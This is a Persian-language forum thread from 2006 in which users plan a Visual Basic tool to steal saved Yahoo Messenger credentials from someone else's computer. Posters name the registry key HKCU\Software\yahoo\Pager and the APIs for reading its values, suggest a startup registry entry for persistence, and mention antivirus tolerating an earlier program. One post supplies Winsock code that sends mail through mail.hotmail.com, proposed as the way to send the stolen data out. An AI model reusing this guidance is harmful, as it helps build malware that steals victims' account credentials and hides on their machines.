حالا شما ازمايش كن من كه حرفي نزدم وقتي ميشه بدون رجيستري راحت نوشت چرا كار خودمونو سخت كنيم
راستي يه سايت خوب واسه اپلود سراغ داري بگو ممنون فقط سايتش درد سر دار نباشه مرسي
حالا شما ازمايش كن من كه حرفي نزدم وقتي ميشه بدون رجيستري راحت نوشت چرا كار خودمونو سخت كنيم
راستي يه سايت خوب واسه اپلود سراغ داري بگو ممنون فقط سايتش درد سر دار نباشه مرسي
سايت خوب وايه up مي خاي برو اينجا [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
شما يه مقاله توپ براي يادگيري ريجستري سراق نداري
مساله اينه كه ما مجبوريم با رجيستري در ارتباط باشيم اگه طرف سيو پسورد زده باشه مجبوريم به كمك رجيستري سيو پسورد رو برداريم. من قبلا برنامه نوشتم كه با رجيستري در ارتباط بوده ولي آنتي با برنامم كنار ميومد.
سايت براي آپلود
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] upload ax
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] upload
Last edited by Payman_62; 24-03-2006 at 17:00.
پيمان جان شما كه ريجستري ياد ندادي خودم يه مقاله دربارش پيدا كردم لا اقل راهنماييم كن
لينك مقاله رو ميزارم اگه خاستي بگير [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
من ازت يه سوال داشتم اونم اينه كه يسري كد تو اين مقاله هست بايد تو ما ژول بنويسم اره؟
حالا يا ماژول يا تو فرمت. اگه بخواي تو همه فرمات ازش استفاده كني بذار تو ماژول ولي اگه يه فقط يه فرم داري ميتوني بذاري تو همون يه فرم.
مقاله خيلي خوبيه بخوني كارت را ميفته.
رو RegOpenKeyExA كليد رو باز كن و با RegEnumValueA ميتوني Value مورد نظرت رو سرچ كني.
خوب حالا فرض پسورد رو گرفتي با رجيستري يا بي رجيستري(نظر من بي رجيستريه) چطور ميخواي از تو كامپيوتر طرف واسه خودت سند كني
به كمك Smtp
ببين اقا پيمان اينجوري من هيچي نميفهمم بزا مرحله به مرحلهنوشته شده توسط Payman_62
اول ازت مي پرسم بايد كدوم كدارو حتما تو فرم بنويسم تا كار را بيفته و بتونم با ريجستري توسط فرمانهايي كه گفته كار كنم؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟
ببين داداش من كار با ريجستري و ماژولو درست حسابي ياد بگيرم بقيش حلهنوشته شده توسط sherwood
تازه يسري كد دارم فكر كنم واسه ميل زدنه ميزارم ببين درسته
Dim Counter As Integer
Private Sub Command1_Click()
If txtFrom.Text <> "" And txtRcpt.Text <> "" And txtSubject.Text <> "" And txtBody.Text <> "" Then
wskEmail.Connect "mail.hotmail.com", 25
Timer1.Enabled = True
End If
End Sub
Private Sub Command2_Click()
Timer1.Enabled = False
wskEmail.Close
End Sub
Private Sub Form_Load()
Dim MyIP As String
MyIP = wskEmail.LocalHostName & "'s " & "IP address is " & wskEmail.LocalIP
Label1.Caption = MyIP
End Sub
Private Sub menuExit_Click()
wskEmail.Close
End
End Sub
Private Sub Timer1_Timer()
On Error Resume Next
Counter = Counter + 1
If Counter = 1 Then
wskEmail.SendData "helo" & vbCrLf
ElseIf Counter = 2 Then
wskEmail.SendData "mail from: " & txtFrom.Text & vbCrLf
ElseIf Counter = 3 Then
wskEmail.SendData "rcpt to: " & txtRcpt.Text & vbCrLf
ElseIf Counter = 4 Then
wskEmail.SendData "data" & vbCrLf
ElseIf Counter = 5 Then
wskEmail.SendData "subject: " & txtSubject.Text & vbCrLf
ElseIf Counter = 6 Then
wskEmail.SendData vbCrLf
ElseIf Counter = 7 Then
wskEmail.SendData txtBody.Text & vbCrLf
ElseIf Counter = 8 Then
wskEmail.SendData "." & vbCrLf
ElseIf Counter = 9 Then
wskEmail.SendData "quit" & vbCrLf
Timer1.Enabled = False
End If
End Sub
Private Sub wskEmail_DataArrival(ByVal bytesTotal As Long)
Dim Incomming As String
wskEmail.GetData Incomming
Text1.Text = Incomming & vbCrLf & Text1.Text
End Sub
گفتم كه با RegOpenKeyExA كليدي كه Value مورد نظر توش هست رو باز كن و با RegEnumValueA ميتوني Value مورد نظرت رو سرچ كني. اون كليد كه بايد باز شه HKEY_CURRENT_USER\Software\yahoo\Pager هست و value كه بايد تو اين كليد باز شده سرچ شه ميتونه مثلا Yahoo! User ID باشه. بايد ببيني با توجه به كلك رشتي كه ميخواي بزني رو كدوم value ها بايد كار كني. حالا ببين تو اون فايل pdf كدوم ثابت ها و تعاريف مربوط به اين دو تا API ميشن و اونارو كپي كن.
حالا فعلا با همين 2 API رجيستري كار داريم. ولي در ادامه كار ممكنه API هاي ديگر هم نياز شن. مثل RegCreateKeyExA براي قرار دادن برنامت در استارت آپ كه اونم تو فايل pdf كه گذاشتي توضيح داده شده.
راستي نگفتي چه جوري ميخواي سيو پسورد رو بر ميداري.
هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)